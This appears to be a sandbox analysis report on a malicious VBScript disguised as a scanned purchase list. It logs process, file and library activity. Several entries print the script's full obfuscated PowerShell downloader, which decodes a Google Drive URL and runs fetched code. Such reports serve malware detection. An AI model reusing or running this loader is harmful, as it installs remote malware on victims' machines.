      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohIJump to behavior
      Source: Scanned Purchase List.vbsInitial sample: Strings found which are bigger than 50
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5292
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5292Jump to behavior
      Source: classification engineClassification label: mal92.expl.evad.winVBS@4/5@3/3
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Paralytical.NapJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00datdxo.taw.ps1Jump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned Purchase List.vbs"
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Scanned Purchase List.vbsVirustotal: Detection: 12%
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned Purchase List.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohI
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohIJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: .pdb_ source: powershell.exe, 00000001.00000002.3012431445.000001ADE7E24000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32W source: powershell.exe, 00000001.00000002.3012431445.000001ADE7E24000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ystem.Core.pdb, source: powershell.exe, 00000001.00000002.3012431445.000001ADE7DC9000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      VBScript performs obfuscated calls to suspicious functions
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("Powershell.exe", ""<#selvhrdendes Opdrager Hjremarginerne", "", "", "0");
      Suspicious powershell command line found
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohI
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u 